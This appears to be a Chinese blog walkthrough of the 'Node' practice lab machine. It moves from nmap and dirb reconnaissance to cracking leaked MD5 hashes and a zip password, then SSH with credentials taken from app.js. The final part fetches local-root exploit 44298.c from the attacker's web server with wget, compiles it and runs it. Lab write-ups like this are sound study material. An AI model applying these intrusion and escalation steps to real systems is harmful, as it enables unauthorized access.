Node靶机复盘

文章记录了一次渗透测试的过程,包括主机发现、端口扫描、目录探测、MD5密码解密、Base64解码、暴力破解以及最终的提权和漏洞利用。
摘要由CSDN通过智能技术生成

个人笔记,稍有瑕疵,中途 kali 和 靶机IP 有所改变,总体无影响,介意误入

信息搜集

  1. 主机发现

查看当前网段

ip a   

在这里插入图片描述

扫描网段,发现靶机IP

nmap -sP -T4 10.4.7.0/24

在这里插入图片描述

  1. 端口扫描
nmap -A -p- 10.4.7.132

在这里插入图片描述

  1. 扫描版本信息
nmap -sV -p 22,3000 10.4.7.132

在这里插入图片描述

扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。

  1. 目录扫描
dirb http://10.4.7.132:3000/ -f 

因为http服务使用的是3000端口,不是默认的80端口,所以在进行目录探测时,需使用参数 ’ -f ’ 进行微调。

在这里插入图片描述

继续扫描刚发现的文件

dirb http://10.4.7.132:3000/usr/share/dirb/wordlists/common.txt -f

在这里插入图片描述

接连进行两次目录扫描,都没发现什么可用的目录,

  1. 接下来对目标主机的网站进行访问,查找信息

访问结果如下:

在这里插入图片描述

发现一个可以进行登录的网页,尝试进行使用弱口令admin,admin等尝试多次登录,登录失败。
在这里插入图片描述

  1. F12 查看网页源码

在js文件中发现了可疑的信息,疑似目录,可以尝试进行访问

在这里插入图片描述

访问后:

发现一些用户名和加密的密码,

在这里插入图片描述

该密码是由MD5进行加密的,可以在MD5解密网站进行解密,以下是解密结果:

用户名密码
tomspongebob
marksnowflake
restating未找到密码
  1. 尝试进行登录

分别使用tom、mark用户名进行登录,没有发现什么有用信息,只告诉我们 " 目前只有管理员用户可以访问控制面板,但请尽快检查以测试标准用户功能! "。登录进去后的页面如下图所示。此时,需另谋出路。

在这里插入图片描述

在http://10.4.7.132:3000/api/users/latest这条链接中,单词“latest”表示最新的,去掉“latest”尝试进行访问,说不定会有意想不到的收获。访问10.4.7.132:3000/api/users,发现得到了另外一个用户。

在这里插入图片描述

解密后得到:

用户名密码
myP14ceAdm1nAcc0uNTmanchester

尝试进行登录,登录成功,发现可以下载网站备份,然后进行下载

在这里插入图片描述

下载后的文件
在这里插入图片描述

进行查看网站备份文件

在这里插入图片描述

由于输出内容中末尾还有 ’ = ',所以该文件为Base64编码。

在这里插入图片描述

base64编码特征:

标准base64只有64个字符(英文大小写、数字和+、/)以及用作后缀等号;
等号一定用作后缀,且数目一定是0个、1个或2个。这是因为如果原文长度不能被3整除,base64要在后面添加\0凑齐3n位。为了正确还原,添加了几个\0就加上几个等号。显然添加等号的数目只能是0、1或2;

将会把 myplace.backup 文件中的base64编码的内容解码,并将解码后的内容写入到 myplace.zip 文件中。

base64 -d myplace.backup > myplace.zip

在linux中,一切都是文件。mypalce.zip的后缀名只是方便管理员去管理。

在这里插入图片描述

在进行解压时发现还需要密码,我们并不知道密码

在这里插入图片描述

可以进行密码爆破

在这里使用卡里自带的工具 fcrackzip 进行破解,下方是此工具的一些参数

-f, --file <zipfile>:指定要破解的zip文件路径。
-D, --dictionary <dictfile>:指定密码字典文件的路径。
-b, --brute-force:使用暴力破解模式。
-c, --charset <charset>:指定字符集,常见的选项包括a(小写字母)、A(大写字母)、0(数字)、!(特殊字符)等。您可以根据需要自定义字符集。
-p, --init-password <password>:指定初始密码进行尝试。
-u, --use-unzip:使用unzip命令检查猜测的密码是否正确。
-l, --length <min_length>:<max_length>:指定密码的最小和最大长度范围。
-q, --quiet:静默模式,减少输出信息。
-v, --verbose:详细模式,显示更多输出信息。
-m, --method <method>:指定破解方法,常见的选项有zip2和zip3。
-n, --num-threads <threads>:指定使用的线程数。
-p, --<password>:要尝试的初始密码。

使用命令

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip

爆破得到密码: magicword

在这里插入图片描述

继续解压文件

在这里插入图片描述

解压完成后直接在当前路径下(桌面)生成一个var文件。

在这里插入图片描述

  1. 查看var文件,
    var/www/myplace/ 目录下的 app.js 中发现了貌似有用的信息
    在这里插入图片描述

    这个mongodb实例指向localhost,这些凭证很可能也适合ssh访问,尝试一下。

    ssh mark@10.4.7.132
    密码:5AYRft73VtFpc84k
    

    注:因不可抗因素,靶机和 kali IP 发生改变

    原IP:

    靶机IP:10.4.7.132

    kali IP:10.4.7.133

    现IP:

    靶机IP:10.9.47.106

    kali ip:10.9.47.209
    接下来将使用现在IP继续进行操作

    继续尝试 ssh 连接

    ssh mark@10.9.47.106
    密码:5AYRft73VtFpc84k
    

    成功连接
    在这里插入图片描述

尝试提权

  1. 尝试进行 sudo 提权,发现并不能使用sudo
    在这里插入图片描述

  2. 尝试本地提权

在Kali攻击机上查找和靶机相关的漏洞,找到一个本地提权漏洞,

在这里插入图片描述
在这里插入图片描述

  1. 下载漏洞到本地

    searchsploit -m 44298.c
    

    在这里插入图片描述

  2. 开启一个网站,在靶机中远程下载该文件

    python3 -m http.server 80
    

    在这里插入图片描述

    先进入 /tmp 目录下

    由于 /tmp文件的限制小,能够将文件写入,所以将文件上传到靶机的tmp文件下。
    

    远程下载:

    wget http://10.9.47.209/44298.c
    

    在这里插入图片描述

  3. 对文件进行编译:

    gcc 44298.c -o exp
    

在这里插入图片描述

  1. 对编译好的文件进行赋权

    chmod 777 exp
    

    在这里插入图片描述

  2. 执行后提权成功

./exp

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值